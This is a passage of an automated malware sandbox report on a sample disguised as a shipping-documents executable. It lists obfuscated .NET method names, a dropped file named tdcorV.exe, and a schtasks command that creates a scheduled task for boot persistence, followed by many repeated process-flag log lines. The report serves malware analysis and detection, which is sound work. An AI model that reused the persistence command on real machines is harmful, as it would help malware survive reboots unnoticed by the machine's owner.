Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, kSZLAABypvSS9HaSQd.cs	High entropy of concatenated method names: 'w8fTwqLjgP', 'tVPTM3UwRl', 'YusTBDSE4p', 'UXST9DZhoL', 'gyATebsLFu', 'mF0T53qEtL', 'UvfTv6mUXR', 'afiTX4ZKO6', 'f27TSu2GoQ', 'mRXT1cpFvH'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, cF51482gRxgBjOXKev.cs	High entropy of concatenated method names: 'zjC0rOwpO8', 'zF60o9KVmm', 'iKrkGcbtaJ', 'bTvkAL1ISr', 'NhZ0ZgVtFg', 'xC00MZmQZB', 'lQK0KUgcKh', 'opY0BI9Oaf', 'XYv09YNo2M', 'e450FIToel'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, TB6hxiFXPOcvJ3LAlM.cs	High entropy of concatenated method names: 'ToString', 'V5Q3Zj9jDZ', 'Bdg3e0gjMm', 'URS35GXueh', 'He63vHArsP', 'fHq3XdHrJU', 'cMh3SbfXTB', 'FKX31Va7Lq', 'eIv3ydIw9w', 'WFw347tBm1'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, QjYghpfU82Ev6r9qkG.cs	High entropy of concatenated method names: 'f5AAuqiyp6', 'QwnAt3U12a', 'gIhAItxRXq', 'I2JAmfFAdg', 'WKVATJBaLa', 'bBdA3aCvmP', 'VId3PM94jK9NRZo1ta', 'IrCiKDACVWgC8leAIw', 'H7SAAKu1CF', 'j4dAqOrXMY'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, bqiyp6LBwn3U12aRJ6.cs	High entropy of concatenated method names: 'A9VHBAdSQ6', 'XF1H9c65Xd', 'dMLHFoa8BK', 'XDcHC9Q0YI', 'r59HnecBqa', 'QvPH2G3UpR', 'J3hHcfeYfi', 'GtiHrsfK0j', 'oY8HxZE1N9', 'e8XHoflAEv'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, F3OmGHEIhtxRXq52Jf.cs	High entropy of concatenated method names: 'TYIpWlKluy', 'vctpjMhJWC', 'pqTpLdMRPi', 'gq5pE3oiWd', 'qDlpTQO0L7', 'KW9p3JAG1c', 'uQgp0cljwV', 'Ra5pkIiMff', 'Kv9plhPPjW', 'ipLpgbyEyM'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, PVHmyBzNKgLOkVG9DC.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hDFlRqLCPF', 'CfFlTui5hD', 'LW9l35Mufn', 'hH2l02NtTJ', 'UWglknDhXi', 'v4Dllqkfny', 'CBnlgGGBC2'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, yXBUahHsaeO5hhL8ov.cs	High entropy of concatenated method names: 'Dispose', 'xK9AxE9GgX', 'bYYVeIk1K0', 'O4w227qH2k', 'FxoAo85XT6', 'hLMAzvtWIQ', 'ProcessDialogKey', 'EdDVGftO49', 'n6bVAPiYX0', 'zeZVVWZSeL'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, AZSeLWoXNU2Em3evrk.cs	High entropy of concatenated method names: 'NxOlA9d56J', 'SMblqWuoES', 'NyhlfjXOs7', 'HnflJrmkeJ', 'enflHpgj7I', 'hNhlOt8SWs', 'nOxlQkAwP0', 'knskcoMEXa', 'WUxkrVlGTL', 'AE5kxDLu9V'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, p0Jk0tplFOaPDwPQ51.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MSfVxUmlRS', 'kRDVo1068K', 'jWGVzh2pem', 'TZ5qGXZYPV', 'k4oqAmvKIX', 'yVAqVKnqkg', 'RCXqq2fwoS', 'qOgBeDg29wfL5UmmJny'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, DASuTkAqRlUt9qBnSNq.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xhBgBHJfQX', 'D7xg91FCCc', 'IxRgFb3GjV', 'u67gCGr9Sl', 's7UgnFRiVn', 'eyfg2Txh8G', 'H7igcuqDUN'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, TDSE3NKycqKSaNDhhn.cs	High entropy of concatenated method names: 'k4vRLK00kR', 'hi4RE0qmRn', 'Dj0R8nRAbX', 'CKKRe15MQd', 'SKxRvWwJJO', 'bY3RXDnQhe', 'o75R1jiNF0', 'NuDRyv9w9G', 'jU6RwQn63d', 'SeWRZrr9k7'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, uftO49xR6bPiYX0WeZ.cs	High entropy of concatenated method names: 'vYTk8jmdak', 'EgXkeyLJBb', 'BVyk5X7BoQ', 'SxFkvOAs9a', 'LeKkBUymF2', 'DONkXMydHu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, iI9pqHAGtVb4t3pvgYZ.cs	High entropy of concatenated method names: 'c03l7ONC3D', 'z9eldvjHkR', 'N0wlsNDG7V', 'ldRlWRKZVa', 'o01lNFRvaT', 'yuLljPqur7', 'SsclaSiS6C', 'YtMlLxHRyr', 'uUnlEBFb7a', 'Sf5lYjKYli'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, nDX2exV4Efol9EyBrT.cs	High entropy of concatenated method names: 'VJqsgqPC4', 'nKxWgTDbo', 'RwkjcimEx', 'PQHa0EMe8', 'OEgEmRLtm', 'e05YvtvyZ', 'AXAqX0ptEFeW0fbbEv', 'zsTR5uakseBeCfNNuP', 'UxCkyIPoG', 'Et0gnwy4u'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, Xo85XTr6pLMvtWIQEd.cs	High entropy of concatenated method names: 'a17kJA4X7y', 'sUjkHELgng', 'rTKkp7Qrl3', 'z56kO33URh', 'mCukQNDkdn', 'x9ukuJRsEf', 'RVDktWVURp', 'RqKkb6PA16', 'CuOkIrFyNY', 'FtakmQJvwL'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, qeqLvo4BFkGiHMAm7Y.cs	High entropy of concatenated method names: 'Jv3u7kAwU4', 'kTZudIBXR2', 'Imlus2X8Om', 'ENMuWKmqX5', 'FRauNvgtif', 'bA5ujcUEmp', 'XeruauGGB7', 'BvXuLyoiyc', 'PuEuEtGEZV', 'vTJuYHLC1l'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, CLaABd8aCvmPHd6ibU.cs	High entropy of concatenated method names: 'RFhQii3WKR', 'QsbQH7K8xT', 'S0OQO4VMNY', 'O9AQu23NVl', 'DWqQtVBRa4', 'zC8OnCU9nm', 'nf6O2miVGb', 'cskOcEBo3l', 'EdvOrFtjIv', 'nwoOxqF8dH'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, An5xPAAA94KcU6ST43T.cs	High entropy of concatenated method names: 'ToString', 'DH4gq7UXv3', 'IRXgf9rHCC', 'Eskgi7Xh4b', 'hFogJSjtn3', 'o9EgHf810j', 'kb4gpBKiym', 'avTgOQMgn3', 'eVJaDlwZ1aDwG87ABsY', 'tGdnHhwxJPucb1CL6GS'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, SAdgCYYLpYY10rKVJB.cs	High entropy of concatenated method names: 'bKjONoY4gx', 'bLOOaaY3Km', 'MOdp5ZK0R4', 'zCVpvjqLPS', 'Ti3pXuH3hj', 'lU7pSuD499', 'JAVp1LylBO', 'hitpydXNUW', 'lVOp4hhQ4w', 'syepwWZL4b'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, UV8J1A13b0WyAveFQ9.cs	High entropy of concatenated method names: 'xHNuJTc0fB', 'XV3uphZAlH', 'coDuQZeYpI', 'PgmQo9HtMb', 'K0ZQzNHoIo', 'cTJuGAdp3y', 'MFGuA7Pugh', 'tBZuVnCRbv', 'VkQuqdLLRq', 'nXpufeXcGB'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	High entropy of concatenated method names: 'Q9Vqi6k3Ki', 'P6QqJsrp1a', 'JR9qHaLqkF', 'zGqqp1Ww4T', 'GUfqOB1Tq6', 'IhXqQkZudW', 'ulSquyMpFa', 'eUoqtRaxgl', 'qmIqbPrPtC', 'VcbqIygAFA'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, kSZLAABypvSS9HaSQd.cs	High entropy of concatenated method names: 'w8fTwqLjgP', 'tVPTM3UwRl', 'YusTBDSE4p', 'UXST9DZhoL', 'gyATebsLFu', 'mF0T53qEtL', 'UvfTv6mUXR', 'afiTX4ZKO6', 'f27TSu2GoQ', 'mRXT1cpFvH'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, cF51482gRxgBjOXKev.cs	High entropy of concatenated method names: 'zjC0rOwpO8', 'zF60o9KVmm', 'iKrkGcbtaJ', 'bTvkAL1ISr', 'NhZ0ZgVtFg', 'xC00MZmQZB', 'lQK0KUgcKh', 'opY0BI9Oaf', 'XYv09YNo2M', 'e450FIToel'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, TB6hxiFXPOcvJ3LAlM.cs	High entropy of concatenated method names: 'ToString', 'V5Q3Zj9jDZ', 'Bdg3e0gjMm', 'URS35GXueh', 'He63vHArsP', 'fHq3XdHrJU', 'cMh3SbfXTB', 'FKX31Va7Lq', 'eIv3ydIw9w', 'WFw347tBm1'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, QjYghpfU82Ev6r9qkG.cs	High entropy of concatenated method names: 'f5AAuqiyp6', 'QwnAt3U12a', 'gIhAItxRXq', 'I2JAmfFAdg', 'WKVATJBaLa', 'bBdA3aCvmP', 'VId3PM94jK9NRZo1ta', 'IrCiKDACVWgC8leAIw', 'H7SAAKu1CF', 'j4dAqOrXMY'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, bqiyp6LBwn3U12aRJ6.cs	High entropy of concatenated method names: 'A9VHBAdSQ6', 'XF1H9c65Xd', 'dMLHFoa8BK', 'XDcHC9Q0YI', 'r59HnecBqa', 'QvPH2G3UpR', 'J3hHcfeYfi', 'GtiHrsfK0j', 'oY8HxZE1N9', 'e8XHoflAEv'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, F3OmGHEIhtxRXq52Jf.cs	High entropy of concatenated method names: 'TYIpWlKluy', 'vctpjMhJWC', 'pqTpLdMRPi', 'gq5pE3oiWd', 'qDlpTQO0L7', 'KW9p3JAG1c', 'uQgp0cljwV', 'Ra5pkIiMff', 'Kv9plhPPjW', 'ipLpgbyEyM'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, PVHmyBzNKgLOkVG9DC.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hDFlRqLCPF', 'CfFlTui5hD', 'LW9l35Mufn', 'hH2l02NtTJ', 'UWglknDhXi', 'v4Dllqkfny', 'CBnlgGGBC2'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, yXBUahHsaeO5hhL8ov.cs	High entropy of concatenated method names: 'Dispose', 'xK9AxE9GgX', 'bYYVeIk1K0', 'O4w227qH2k', 'FxoAo85XT6', 'hLMAzvtWIQ', 'ProcessDialogKey', 'EdDVGftO49', 'n6bVAPiYX0', 'zeZVVWZSeL'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, AZSeLWoXNU2Em3evrk.cs	High entropy of concatenated method names: 'NxOlA9d56J', 'SMblqWuoES', 'NyhlfjXOs7', 'HnflJrmkeJ', 'enflHpgj7I', 'hNhlOt8SWs', 'nOxlQkAwP0', 'knskcoMEXa', 'WUxkrVlGTL', 'AE5kxDLu9V'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, p0Jk0tplFOaPDwPQ51.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MSfVxUmlRS', 'kRDVo1068K', 'jWGVzh2pem', 'TZ5qGXZYPV', 'k4oqAmvKIX', 'yVAqVKnqkg', 'RCXqq2fwoS', 'qOgBeDg29wfL5UmmJny'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, DASuTkAqRlUt9qBnSNq.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xhBgBHJfQX', 'D7xg91FCCc', 'IxRgFb3GjV', 'u67gCGr9Sl', 's7UgnFRiVn', 'eyfg2Txh8G', 'H7igcuqDUN'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, TDSE3NKycqKSaNDhhn.cs	High entropy of concatenated method names: 'k4vRLK00kR', 'hi4RE0qmRn', 'Dj0R8nRAbX', 'CKKRe15MQd', 'SKxRvWwJJO', 'bY3RXDnQhe', 'o75R1jiNF0', 'NuDRyv9w9G', 'jU6RwQn63d', 'SeWRZrr9k7'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, uftO49xR6bPiYX0WeZ.cs	High entropy of concatenated method names: 'vYTk8jmdak', 'EgXkeyLJBb', 'BVyk5X7BoQ', 'SxFkvOAs9a', 'LeKkBUymF2', 'DONkXMydHu', 'Next', 'Next', 'Next', 'NextBytes'

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe

File created: C:\Users\user\AppData\Roaming\tdcorV.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
